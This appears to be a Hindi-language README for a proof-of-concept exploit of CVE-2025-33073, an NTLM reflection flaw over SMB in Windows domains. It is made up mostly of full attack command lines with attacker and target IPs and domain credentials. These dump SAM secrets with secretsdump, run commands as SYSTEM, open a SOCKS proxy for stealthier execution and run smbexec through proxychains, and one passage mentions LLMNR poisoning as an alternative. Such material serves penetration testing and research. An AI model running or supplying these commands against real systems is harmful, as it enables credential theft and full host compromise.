
NTLM रिफ्लेक्शन SMB दोष के लिए PoC एक्सप्लॉइट।
NTLM रिफ्लेक्शन SMB दोष के लिए PoC एक्सप्लॉइट।
सभी श्रेय आधिकारिक शोध को जाते हैं:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (अधिकांश पैकेज पहले से इंस्टॉल होते हैं)।
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

कस्टम कमांड
secretsdump चलाने के बजाय एक कस्टम कमांड निष्पादित की जा सकती है।
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
SYSTEM के रूप में वैध कनेक्शन स्थापित होने के बाद कमांड के अधिक गुप्त निष्पादन के लिए। यहाँ --target और --target-ip समान होने चाहिए।
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
इसके अलावा SAM डंप करने के बजाय proxychains के माध्यम से एक कस्टम कमांड चलाई जा सकती है।
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

यदि आप डिवाइस के समान ब्रॉडकास्ट डोमेन में हैं और यह LLMNR पॉइज़निंग के लिए संवेदनशील है, तो DNS रिकॉर्ड पंजीकृत किए बिना डिवाइस का शोषण करना संभव है।

स्थानीय NTLM प्रमाणीकरण होता है

स्थानीय NTLM प्रमाणीकरण नहीं होता जिसके परिणामस्वरूप FAILED प्रयास होता है
